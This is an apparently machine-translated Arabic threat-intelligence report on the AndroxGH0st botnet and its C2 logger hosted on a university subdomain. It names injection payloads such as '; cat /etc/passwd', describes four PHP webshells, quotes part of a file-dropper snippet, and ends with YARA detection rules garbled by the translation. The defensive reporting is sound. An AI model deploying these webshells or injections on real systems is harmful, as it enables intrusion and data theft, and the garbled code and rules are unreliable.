🚀 أصبحت CloudSek أول شركة للأمن السيبراني من أصل هندي تتلقى استثمارات منها ولاية أمريكية صندوق
اقرأ المزيد
إلى الخلف
استخبارات الخصم
يواصل AndroxGH0st الاستغلال: يقوم المشغلون بتهديد جامعة أمريكية لاستضافة C2 Logger
كشفت CloudSek أن الروبوتات AndroxGH0st اخترقت نطاقًا فرعيًا لجامعة كاليفورنيا في سان دييغو لاستضافة مسجل C2 الخاص بها. تعمل الروبوتات النشطة منذ عام 2023، وتستغل نقاط الضعف في أجهزة Apache Shiro و Spring4Shell و WordPress وأجهزة إنترنت الأشياء والمزيد لتنفيذ التعليمات البرمجية عن بُعد وتعدين التشفير. تم نشر Webshells أيضًا من أجل الثبات.
June 22, 2025
7
دقيقة
ملخص تنفيذي
يكشف التحقيق الأخير الذي أجرته CloudSek أن أندروكسجيست بوت نت تطورت بشكل كبير منذ نشاطها المبكر في عام 2023، مستفيدة من مجموعة واسعة من متجهات الوصول الأولي (IAVs). خوادم تم تكوينها بشكل خاطئ/ضعيفة مرتبطة بـ المؤسسات الأكاديمية والمجالات العامة، مثل جامعة كاليفورنيا، النطاق الفرعي «USarHythms» في سان دييغو، تم العثور عليها تستضيف لوحات تسجيل الأوامر والتحكم (C2). تستغل الروبوتات المنصات الشهيرة (مثل أباتشي شيرو، وإطار سبرينج، ووردبرس) وأجهزة إنترنت الأشياء (لانترونيكس)، مما يتيح تنفيذ التعليمات البرمجية عن بُعد وسرقة البيانات الحساسة والتعدين المشفر. تسلط الأدلة من سجلات C2 الضوء على محاولات الاستغلال باستخدام عدد كبير من تقنيات حقن الأوامر. تعمل أغلفة الويب المزروعة على البنية التحتية المخترقة على تسهيل الوصول المستمر ونشر المزيد من الحمولة.
التحليل
الخلفية
- في العام الماضي كلاود سيكاكتشفت TRIAD أن الروبوتات AndroxGH0st تستغل أكثر من 20 نقطة ضعف منذ أغسطس 2024 على الأقل. [تقرير كامل]
- أصدرت CISA ورقة مالية استشاري في يناير 2024، لرفع مستوى الوعي حول التوسع في شبكة AndroxGH0st الروبوتية.
- بعد تقرير CloudSek، أقرت CISA، بالإضافة إلى مصنعي المعدات الأصلية الآخرين، بالاستغلال النشط لنقاط الضعف وإضافتها إلى قائمة KEV.
- كشفت النتائج الأخيرة أن الروبوتات تعمل منذ مارس 2023 على الأقل، وقامت بتسليح العديد من عمليات استغلال تطبيقات الويب الجديدة لاستخدامها كجزء من ترسانتها، بالإضافة إلى 4 أغلفة ويب من المحتمل استخدامها كأدوات لما بعد الاستغلال.
في تقريرنا الأول، توقعت CloudSek أن مشغلي AndroxGH0st سيقدمون العديد من الحمولات الجديدة في المزيج بحلول منتصف عام 2025. يهدف هذا التقرير إلى فهم تطور الروبوتات، بما في ذلك ناقلات الوصول الأولي الرئيسية (IAVs) التي تم تسليحها بالإضافة إلى تقاريرنا السابقة.
التحليل
- أثناء عمليات الفحص الروتينية التي أجريناها بحثًا عن عمليات البحث عن البنية التحتية الضارة، عثرت TRIAD من CloudDesk على خوادم الأوامر والتحكم التي تستخدمها شبكة AndroxGH0st الروبوتية.
- ينتمي النطاق الأصلي إلى»جامعة كاليفورنيا، سان دييغو».
- النطاق الفرعي»أوسا ريثمز«يبدو أنه البوابة التي تخص المنتخب الوطني الأمريكي لكرة السلة للرجال تحت 19 عامًا، تم اختيارها لكأس العالم لكرة السلة FIBA تحت 19 عامًا 2025.
- كما ورد في وقت سابق، تفضل AndroxGH0st استضافة البنية التحتية للمسجل على مواقع الويب المخترقة. في العام الماضي، استضاف مشغلو الروبوتات المسجل الخاص بهم على موقع الويب الخاص بمنصة تجميع الأحداث الجامايكية. هذه المرة، إنها جامعة في الولايات المتحدة.
- كما نرى، تقوم الخوادم بتخزين الطلبات من وكلاء الروبوتات بمرور الوقت.
متجهات الوصول الأولي - AndroxGH0st بوت نت
يمثل هذا ارتفاعًا بنسبة 50٪ تقريبًا في عدد ناقلات الوصول الأولية التي تم تسليحها بواسطة AndroxGH0st منذ تقريرنا السابق.
أباتشي شيرو، حقن JNDI الخاص بقاعدة بيانات XML جاكسون بشكل أسرع
تُعد إدخالات السجل التي تستخدم «org.apache.shiro.jndi.jndi.jndiObjectFactory» وorg.apache.xbean.propertyEditor.jndiConverter وcom.ibatis.sqlmap.engine.transaction.jta.jtaTransactionConfig مع عنوان URL الخاص بـ RMI الذي يشير إلى «استغلال» على C2 محاولات كلاسيكية لاستغلال ثغرة أمنية في واجهة جافا للتسمية والدليل (JNDI). يمكن أن تؤدي هذه التقنية إلى تنفيذ التعليمات البرمجية عن بُعد (RCE) على الخادم المستهدف. لأباتشي شيرو،
- يرسل Androxgh0st طلبًا يحتوي على كائن مصمم خصيصًا يحدد فئة org.apache.shiro.jndi.jndiObjectFactory. من المعروف أن هذه الفئة عرضة لحقن Java للتسمية وواجهة الدليل (JNDI).
- يشير حقل ResourceName إلى خادم استدعاء الأسلوب البعيد (RMI) الضار الذي يتحكم فيه المهاجم.
- إذا كان الخادم المستهدف ضعيفًا، فسوف يتصل بخادم المهاجم وينفذ الحمولة، مما يؤدي إلى حل وسط.
خطوط من مسجل الأوامر:
حقن أوامر يونيك:
يعد الأمر «؛ cat /etc/passwd" البسيط والفعال المخفي داخل معلمة queriesCNT محاولة صارخة لتنفيذ أوامر عشوائية على نظام يشبه Unix وسرقة معلومات حساب المستخدم الحساسة.
- تقوم البرامج الضارة بإدخال أمر shell إلى معلمة من المحتمل أن يتم تنفيذها بواسطة نظام تشغيل الخادم.
- في هذه الحالة، يتم إلحاق الأمر cat /etc/passwd بأمر شرعي، مفصولًا بفاصلة منقوطة، لقراءة الملف الذي يحتوي على معلومات حساب المستخدم.
خطوط من مسجل الأوامر:
ثغرة أمنية في البرنامج المساعد لووردبريس (CVE-2019-17574):
يشير السجل صراحةً إلى CVE هذا، ويستهدف المكون الإضافي «Popup Maker» لـ WordPress في محاولة لاستغلال عيب معروف.
- يستهدف هذا الهجوم بشكل مباشر ثغرة معروفة في المكون الإضافي «Popup Maker» لـ WordPress.
- من خلال تعيين popmake_action إلى popup_sysinfo، يحاول المهاجم تشغيل وظيفة في المكون الإضافي تكشف معلومات النظام.
خطوط من مسجل الأوامر:
حقن أوامر لانترونيكس WLANScanSSID:
تشير الإدخالات التي تستهدف وظيفة WLANScansSSID مع أوامر curl المضمنة في معلمة SSID إلى محاولات استغلال ثغرة أمنية في إدخال الأوامر، على غرار CVE-2021-21881.
- تستغل البرامج الضارة ثغرة في حقن الأوامر في وظيفة WlanScansSID لأجهزة Lantronix.
- يقوم بإدخال أمر curl في المعلمة ssid، مما يجبر الجهاز على تقديم طلب HTTP إلى خادم يتحكم فيه المهاجم.
- هذا يؤكد أن الجهاز ضعيف ويمكن التحكم فيه عن بُعد.
خطوط من مسجل الأوامر:
حقن أباتشي ستروتس OGNL:
توجد حمولة معقدة من لغة الملاحة الشيئية (OGNL)، وهي سمة مميزة للهجمات ضد إطار Apache Struts2 (على سبيل المثال، CVE-2017-5638) التي يمكن أن تؤدي إلى RCE.
- هذا هجوم متطور يستخدم حمولة معقدة من لغة الملاحة الشيئية (OGNL).
- تم تصميم الحمولة لمعالجة بيئة تشغيل Java على الخادم لتجاوز قيود الأمان.
- الهدف النهائي من هذه الحمولة هو تنفيذ الأمر cat /etc/passwd، على غرار هجوم حقن الأوامر الأبسط.
خطوط من مسجل الأوامر:
إطار الربيع RCE (Spring4Shell):
يشير التلاعب بـ Class.module.ClassLoader إلى محاولات استغلال ثغرة Spring4Shell الحرجة (CVE-2022-22965)، والتي تسمح بتنفيذ التعليمات البرمجية عن بُعد.
- يتلاعب المهاجم بخصائص أداة تحميل الفئة في Spring Framework، وهي ثغرة تعرف باسم Spring4Shell.
- من خلال تعيين ملف Class.module.classloader.resources.context.config إلى موقع بعيد، يمكن للمهاجم خداع الخادم لتحميل ملف تكوين ضار.
- يمكن أن يؤدي ذلك إلى تنفيذ التعليمات البرمجية عن بُعد (RCE)، مما يمنح المهاجم التحكم الكامل في الخادم.
خطوط من مسجل الأوامر:
تعدين العملات المشفرة
وجود طلبات JSON-RPC مثل {«id»: 1، «الطريقة»: «getwork»، «المعلمات»: []} و {«id»: 1، «الطريقة»: «eth_getWork»، «المعلمات»: []} يشير بقوة إلى أن المهاجمين ينشرون أيضًا برامج تعدين العملات المشفرة على الخوادم التي تمكنوا من اختراقها يتم استخدام هذه الأوامر لجلب مهام التعدين من تجمع التعدين.
بالإضافة إلى ذلك، وجدنا مجموعة من أغلفة الويب المصممة لمختلف الأدوات المساعدة.
1. abuok.php (hex2bin+حمولة التقييم)
- ماذا تفعل:
- يكتب ملف PHP الذي:
- يقمع الأخطاء.
- ينفذ التعليمات البرمجية الغامضة (عبر eval (hex2bin (...))).
- ملفوفة بعبارة «abu... ok» غير المرغوب فيها ربما لتجاوز الماسحات الضوئية الأساسية.
- يكتب ملف PHP الذي:
- سلوك الحمولة (تم فك تشفيره):
- يعرّف الفئة N بالطرق __construct و __destrut و e ().
- في __destrut ()، يتحقق مما إذا كان $this->c [5] === 'P' وينفذ $this->e ().
- تستدعي الدالة e () في النهاية eval (...) على كود PHP المنشور ($_POST ['abu']).
- هذا هو تنفيذ التعليمات البرمجية عن بعد عبر طلب POST.
2. myabu.php (تشويش ROT13، منشور التقييم)
- ماذا تفعل:
- str_rot13 («riny») = «التقييم».
- هذا يعني: التقييم ($_POST ['abu'])؛
- الغرض: كلاسيكي غلاف ويب PHP قبول التعليمات البرمجية التعسفية عبر POST.
3. scwj.php (غلاف تحميل الملف)
- الغرض: أ الباب الخلفي لتحميل الملفات.
- يمكّن المهاجم من تحميل أي ملف (على سبيل المثال، المزيد من البرامج الضارة وأغطية الويب) إلى الخادم.
4. baocun.php (قطارة الكود عبر منطقة النص)
$content = '<form method=\ "post\" ><textarea name=\ "x\" ></textarea> <button>أبوك <?</button></form> php $_POST «،
«ملف_put_contents (\" a.php\»، $_POST [\ "x\"])؛؟ >';\ r\n\ r\nإذا (file_put_contents ($اسم الملف، $content، FILE_APPEND)!» : «= خطأ) {\ r\necho\" XRABUOK\»؛\ r\n} آخر {\ r\necho\ "XRABUSB\»؛\ r\n}\ r\n؟ >\ r\n»
- الغرض: أ قطارة الكود.
- يقبل الإدخال عبر POST في منطقة نصية.
- اكتبها على ملف a.php.
- لماذا؟ للسماح للمهاجم بزرع برنامج نصي جديد على النظام.
IOC
التأثير
- الوصول غير المصرح به إلى البنية التحتية الحيوية والمجالات الأكاديمية.
- تعرض خروقات البيانات معلومات تحديد الهوية الشخصية أو ملفات التكوين الحساسة.
- تم إعادة استخدام الأنظمة المخترقة لتعدين التشفير أو استضافة البرامج الضارة.
- التعرض التنظيمي/القانوني بسبب الفشل في تصحيح CVEs المعروفة.
- الضرر المحتمل للعلامة التجارية من سوء استخدام النطاقات الموثوقة.
عوامل التخفيف
- قم بتصحيح جميع الأنظمة المتأثرة بالأقراص المدمجة المدرجة (على سبيل المثال، Shiro، Spring4Shell، Fastjson، Jackson).
- قم بتقييد وصول RMI وLDAP وJNDI الصادر في جدار الحماية.
- قم بمراقبة المكونات الإضافية لنظام إدارة المحتوى وتقويتها، وخاصة «Popup Maker» على WordPress.
- قم بمراجعة أنظمة الملفات بانتظام لملفات PHP غير المتوقعة.
- استخدم WAF أو الحماية الذاتية لتطبيق وقت التشغيل (RASP) لتطبيقات الويب.
تحقق من علامات التسوية
- ابحث عن أغلفة ويب PHP ذات حمولات غامضة مثل eval (hex2bin (...)) أو ROT13.
- تحقق من السجلات بحثًا عن معاملات POST المشبوهة مثل أوامر «abu» أو shell.
- اكتشف الطلبات ذات القيم المحقونة مثل «؛ cat /etc/passwd» أو تعبيرات OGNL.
- حدد الإشارات المرجعية إلى .oast.me أو.oast.today أو.oast.fun أو نطاقات مشابهة.
- راجع سجلات الخادم لنشاط JNDI/RMI الذي يستهدف برامج تحميل الفئات أو قاعدة بيانات Jackson.
- لاكتشاف التحميلات الضارة أو استخدام القذائف في وقت التشغيل، ضع عمليات مسح YARA على:
- /var/www/
- /tmp/
- /التحميلات/
- مجلدات إضافات ووردبريس
قاعدة يارا: أندروكسGH0ST_ويبشل_أبوك_HEX2bin
قاعدة أندروكس_H0ST_ويبشل_أبوك_HEX2bin
{
ميتا:
الوصف = «يكتشف غلاف AndroxGH0st باستخدام hex2bin + eval»
المؤلف = «CloudSek»
متغير webshell = "abuok.php»
الخطورة = «عالية»
سلاسل:
$s1 = «الإبلاغ عن الخطأ (0)؛» بدون حالة
$s2 = «القيمة (hex2bin (») في حالة الأحرف الأولى
$s3 = «abu<؟ php» بدون أي قضية
$4 = «XRABUOK» في أي حال
الشرط:
حجم الملف <100 كيلوبايت وكل ($*)
}
قاعدة يارا: أندروكسGH0ST_WEBSHELL_myabu_ROT13_EVAL
قاعدة أندروكس_H0ST_ويبشل_myabu_ROT13_EVAL
{
ميتا:
الوصف = «يكتشف غلاف AndroxGH0st باستخدام تقييم ROT13"
المؤلف = «CloudSek»
عائلة البرامج الضارة = «AndroxGH0st»
متغير webshell = "myabu.php»
الخطورة = «متوسطة»
سلاسل:
$s1 = «str_rot13 (\ «riny\»)» في حالة
$s2 = «صورة جديدة ($_POST [\" abu\ "])؛» بدون حالة
$3 = «XRABUOK» على أي حال
الشرط:
حجم الملف أقل من 50 كيلوبايت وكل ($*)
}
قاعدة يارا: أندروكس_G0ST_تحميل_شيل_SCWJ
القاعدة أندروكس_H0st_تحميل_shell_scwj
{
ميتا:
الوصف = «يكتشف غلاف تحميل ملف AndroxGH0st»
المؤلف = «CloudSek»
متغير webshell = "scwj.php»
الخطورة = «متوسطة»
سلاسل:
$s1 = «<نوع الإدخال =\" ملف\ "» بدون حالة
$s2 = «نقل الملف المحمّل ($_FILES» بدون أي حال
$s3 = «<؟ php» بدون أي قضية
$4 = «XRABUOK» في أي حال
الشرط:
حجم الملف أقل من 50 كيلوبايت وكل ($*)
}
قاعدة يارا: أندروكسGH0ST_Dropper_Baocun
قاعدة أندروكس_G0ST_Dropper_Baocun
{
ميتا:
الوصف = «يكتشف قطارة كود PHP المستخدمة من قبل AndroxGH0st»
المؤلف = «CloudSek»
متغير webshell = "baocun.php»
الخطورة = «متوسطة»
سلاسل:
$s1 = «<textarea name=\" x\ ">» بدون أي حال
$s2 = «ملف_put_contents (\" a.php\»، $_POST [\ "x\"])؛» بدون حالة
$3 = «XRABUOK» على أي حال
الشرط:
حجم الملف أقل من 50 كيلوبايت وكل ($*)
}
المراجع
كوشيك بالم
نيفيا رافي
اشترك في موارد CloudSek
احصل على أحدث أخبار الصناعة والتهديدات والموارد.
